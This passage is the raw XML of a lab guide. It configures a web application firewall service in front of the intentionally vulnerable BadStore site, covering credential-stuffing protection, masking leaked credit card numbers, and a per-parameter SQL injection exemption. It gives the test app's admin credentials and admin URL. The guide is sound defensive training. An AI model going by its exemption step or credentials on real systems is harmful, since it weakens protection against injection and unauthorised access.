        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E481A2F" w14:textId="6577B341" w:rsidR="004C3974" w:rsidRDefault="004C3974" w:rsidP="00051308">
      <w:r>
        <w:t xml:space="preserve">Click Bot Attacks, and under Credential Stuffing enter </w:t>
      </w:r>
      <w:r w:rsidRPr="004739DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the username field and </w:t>
      </w:r>
      <w:r w:rsidRPr="004739DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the password field as shown</w:t>
      </w:r>
      <w:r w:rsidR="004739DE">
        <w:t xml:space="preserve"> here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA8215" w14:textId="12408BC7" w:rsidR="004C3974" w:rsidRDefault="004C3974" w:rsidP="00051308">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5672F36E" wp14:editId="55B45E69">
            <wp:extent cx="2628900" cy="155739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0635" cy="1605819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBEBD6" w14:textId="77777777" w:rsidR="00956929" w:rsidRDefault="00956929" w:rsidP="00051308">
      <w:r>
        <w:t xml:space="preserve">Go to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CNAME. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F53AAC" w14:textId="66824C74" w:rsidR="00956929" w:rsidRDefault="00956929" w:rsidP="00051308">
      <w:r>
        <w:t xml:space="preserve">Click Login / Register and try logging in as </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00637DDF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>julio.tan@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> / please</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F1BC5" w14:textId="5589B844" w:rsidR="004C3974" w:rsidRDefault="00956929" w:rsidP="00051308">
      <w:r>
        <w:t xml:space="preserve">Verify the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> blocks this, and the Firewall Log shows</w:t>
      </w:r>
      <w:r w:rsidR="004739DE">
        <w:t xml:space="preserve"> this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064857C" w14:textId="4B0BF644" w:rsidR="00956929" w:rsidRDefault="004739DE" w:rsidP="00051308">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F367DF" wp14:editId="5D5502DB">
            <wp:extent cx="5943600" cy="1619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19250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E2784" w14:textId="16125B21" w:rsidR="009307BA" w:rsidRDefault="009307BA" w:rsidP="001A0E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credit Card </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:t xml:space="preserve">PII </w:t>
      </w:r>
      <w:r>
        <w:t>Leakage</w:t>
      </w:r>
      <w:r w:rsidR="5009B39E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFABB8B" w14:textId="3E34DFAA" w:rsidR="009307BA" w:rsidRDefault="009307BA" w:rsidP="32F6121D">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve">was showing off my reporting system to our auditor last week.  I </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">logged into the site’s admin interface by going to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Login/Regist</w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r>
        <w:t>” page, entering “</w:t>
      </w:r>
      <w:r w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>” in the username box and “</w:t>
      </w:r>
      <w:r w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:t>” in the password</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve"> box.  Then I went to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D140A2">
        <w:t>Super Secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve"> Administration Menu by navigating to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D140A2" w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D140A2" w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D140A2" w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>badstore.cgi?action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D140A2" w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D140A2" w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve">  I chose “</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2" w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>View Sales Reports</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t>” and clicked “</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2" w:rsidRPr="00220C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do It</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve">.”  I glanced at the auditor and her eyes were wide!  She said something about how we </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">were showing full credit card numbers, and PCI compliance, and threatened legal consequences. What do I do???  I </w:t>
      </w:r>
      <w:r w:rsidR="2681B805">
        <w:t>do not</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve"> want to lose my super-cool sales report though</w:t>
      </w:r>
      <w:r w:rsidR="0044678B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055B987C" w14:textId="24999219" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="009307BA">
      <w:r>
        <w:t>How can you fix this glaring security hole?</w:t>
      </w:r>
      <w:r w:rsidR="00826FB4" w:rsidRPr="00826FB4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00826FB4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32BA03F1" wp14:editId="4D44971E">
            <wp:extent cx="5943600" cy="1228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28090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117795C" w14:textId="3DDB2A04" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="00D140A2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB272EB" w14:textId="77777777" w:rsidR="0044678B" w:rsidRDefault="62703AE9" w:rsidP="32F6121D">
      <w:r>
        <w:t>Try for yourself and run through the steps to reproduce what the auditor saw.  Notice if you do follow the flow – you will see credit card information... which is what we want</w:t>
      </w:r>
      <w:r w:rsidR="39A71567">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> avoid.</w:t>
      </w:r>
      <w:r w:rsidR="0044678B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve">Look for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="6202FA0C">
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="6202FA0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidR="7E8B19AC">
        <w:t xml:space="preserve"> which can be used to </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t>prevent sensitive information from being leaked out from the application.</w:t>
      </w:r>
      <w:r w:rsidR="00C82134">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00345E41" w14:textId="65B65A48" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="32F6121D">
      <w:r w:rsidRPr="32F6121D">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33203AA9" w14:textId="04E6401E" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="00D140A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add the Data Theft Protection component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B4B943" w14:textId="33E69DCE" w:rsidR="28FAB926" w:rsidRDefault="28FAB926" w:rsidP="21B1CB40">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5C864C" wp14:editId="034A226C">
            <wp:extent cx="4197350" cy="1636966"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1023952791" name="Picture 102395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42461" cy="1654559"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF19775" w14:textId="3E788D16" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="00D140A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Turn on Data Theft Protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABE6E42" w14:textId="1CEF1C5B" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="009E7391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click Add Element.  Give it a </w:t>
      </w:r>
      <w:r w:rsidR="23E0A8FA">
        <w:t xml:space="preserve">name </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:t>such as “C</w:t>
      </w:r>
      <w:r w:rsidR="00407B87">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00407B87">
        <w:t>or “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00407B87">
        <w:t>creditcards</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00407B87">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="23E0A8FA">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> choose Credit Cards for Identity Theft Type</w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:t xml:space="preserve"> and select Cloak for the action</w:t>
      </w:r>
      <w:r w:rsidR="00407B87">
        <w:t xml:space="preserve">.  Cloak </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:t>will obscure the credit card number</w:t>
      </w:r>
      <w:r w:rsidR="00407B87">
        <w:t xml:space="preserve"> so the customer can pass the audit.  </w:t>
      </w:r>
      <w:r>
        <w:t>You can leave the 4 initial characters and 0 trailing characters</w:t>
      </w:r>
      <w:r w:rsidR="1BBA3D76">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Click Add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C295A" w14:textId="7DE33950" w:rsidR="699639B3" w:rsidRDefault="50D9FEAE" w:rsidP="005E6CED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Refresh the “View Sales Reports”.  </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:t xml:space="preserve">You will most of the credit card numbers have been obscured, the few that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00220C64">
        <w:t>are not are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00220C64">
        <w:t xml:space="preserve"> not even valid </w:t>
      </w:r>
      <w:r w:rsidR="1A668983">
        <w:t>credit card number</w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:t xml:space="preserve">s to begin with.  </w:t>
      </w:r>
      <w:r w:rsidR="00497083">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55753988" wp14:editId="517A3CC4">
            <wp:extent cx="5378450" cy="1170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1286" cy="1175472"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA80A19" w14:textId="77777777" w:rsidR="00B8004C" w:rsidRDefault="00B8004C" w:rsidP="00B8004C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B428DB0" w14:textId="612C683E" w:rsidR="00D140A2" w:rsidRDefault="00D450FF" w:rsidP="00B8004C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fix a </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t>False Positive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:t xml:space="preserve"> Guestbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26C156" w14:textId="39C356B6" w:rsidR="009D66ED" w:rsidRDefault="00D140A2" w:rsidP="00D140A2">
      <w:r>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E2460F" w14:textId="095E7E52" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="32F6121D">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>I had a customer who was</w:t>
      </w:r>
      <w:r w:rsidR="00A575CC">
        <w:t>.  Sh</w:t>
      </w:r>
      <w:r>
        <w:t>e went to the Guestbook page, and typed in the following comment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2100C" w14:textId="13D0E6B9" w:rsidR="00D140A2" w:rsidRDefault="00D140A2" w:rsidP="32F6121D">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried to order from the union of your stores, but when I try to select a product, from your selection, I </w:t>
      </w:r>
      <w:r w:rsidR="1198FA11" w:rsidRPr="32F6121D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51720D3B" w14:textId="080D4CC8" w:rsidR="003B48A4" w:rsidRDefault="24DC13B2" w:rsidP="699639B3">
      <w:r>
        <w:t>To the customer’s surprise, he was blocked from posting the comment!</w:t>
      </w:r>
      <w:r w:rsidR="4C72CD17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF86766" wp14:editId="5A8A28D9">
            <wp:extent cx="2028825" cy="1202989"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1713045915" name="Picture 171304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0459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28825" cy="1202989"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DB38D" w14:textId="4A794989" w:rsidR="00D140A2" w:rsidRDefault="003B48A4" w:rsidP="003B48A4">
      <w:r>
        <w:t>Can you figure out why and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06F585" w14:textId="78A005F4" w:rsidR="003B48A4" w:rsidRDefault="003B48A4" w:rsidP="003B48A4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E116BF6" w14:textId="4F423895" w:rsidR="003B48A4" w:rsidRDefault="003B48A4" w:rsidP="003B48A4">
      <w:r>
        <w:t>Try it yourself and look at the Firewall Log to see why the request was blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FCAF3" w14:textId="6FDF5F7F" w:rsidR="2C24694F" w:rsidRDefault="3F6CA8C4" w:rsidP="699639B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5666C10B" wp14:editId="2CB9F258">
            <wp:extent cx="4029076" cy="1710888"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="546672717" name="Picture 54667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672717"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4029076" cy="1710888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC59FD6" w14:textId="514F5F15" w:rsidR="003B48A4" w:rsidRDefault="003B48A4" w:rsidP="003B48A4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE7946C" w14:textId="2F211BE7" w:rsidR="699639B3" w:rsidRDefault="003B48A4">
      <w:r>
        <w:t xml:space="preserve">It looks like we need to </w:t>
      </w:r>
      <w:r w:rsidR="00AA743A">
        <w:t xml:space="preserve">turn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AA743A" w:rsidRPr="00AA743A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r w:rsidR="00AA743A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Injection patterns from being blocked here</w:t>
      </w:r>
      <w:r w:rsidR="428D8395">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">But obviously, we </w:t>
      </w:r>
      <w:r w:rsidR="00EDBF3A">
        <w:t>do not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> want to turn SQL Injection protection off for the </w:t>
      </w:r>
      <w:r w:rsidR="3337FCC0">
        <w:t>entire site</w:t>
      </w:r>
      <w:r>
        <w:t>. Which component could help us?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69B8F8" w14:textId="7774E8C7" w:rsidR="003B48A4" w:rsidRDefault="003B48A4" w:rsidP="003B48A4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1322E3" w14:textId="19984F89" w:rsidR="003B48A4" w:rsidRDefault="003B48A4" w:rsidP="003B48A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add the App Profiles component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D65E6" w14:textId="48E98541" w:rsidR="003B48A4" w:rsidRDefault="00163BC3" w:rsidP="003B48A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click Add </w:t>
      </w:r>
      <w:r w:rsidR="653A5B93">
        <w:t>URL and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> add the URL from the firewall log: “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badstore.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330051A" w14:textId="2D5DB61B" w:rsidR="003B48A4" w:rsidRDefault="00163BC3" w:rsidP="699639B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You can leave all the settings at their defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BD3DA" w14:textId="787FEB0D" w:rsidR="00163BC3" w:rsidRDefault="00163BC3" w:rsidP="699639B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hover over the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badstore.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” profile, and click the “Add Parameter” icon (looks like a plus with</w:t>
      </w:r>
      <w:r w:rsidR="6A9851C5">
        <w:t xml:space="preserve"> a gear)</w:t>
      </w:r>
      <w:r w:rsidR="00AA743A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0670459F" w14:textId="117F8DA6" w:rsidR="00163BC3" w:rsidRDefault="16C9B2F1" w:rsidP="005A2598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EEFCEBE" wp14:editId="279094B8">
            <wp:extent cx="2908300" cy="1381443"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="347451931" name="Picture 34745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451931"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2928848" cy="1391203"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9146E0" w14:textId="033487CE" w:rsidR="00163BC3" w:rsidRDefault="00163BC3" w:rsidP="006325FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enter the parameter which was blocked in the firewall log for the parameter name: “comments”</w:t>
      </w:r>
      <w:r w:rsidR="005A2598">
        <w:t xml:space="preserve"> as shown and f</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:t xml:space="preserve">or Parameter Class, select Custom. </w:t>
      </w:r>
      <w:r w:rsidR="004C5DB5">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:t xml:space="preserve"> uncheck “Block SQL </w:t>
      </w:r>
      <w:r w:rsidR="004C5DB5">
        <w:t xml:space="preserve">Injection” </w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="40AF8625">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77AA75F9" wp14:editId="747744A4">
            <wp:extent cx="2755900" cy="2374666"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="57603019" name="Picture 576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030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3620" cy="2389935"/>
                    </a:xfrm>
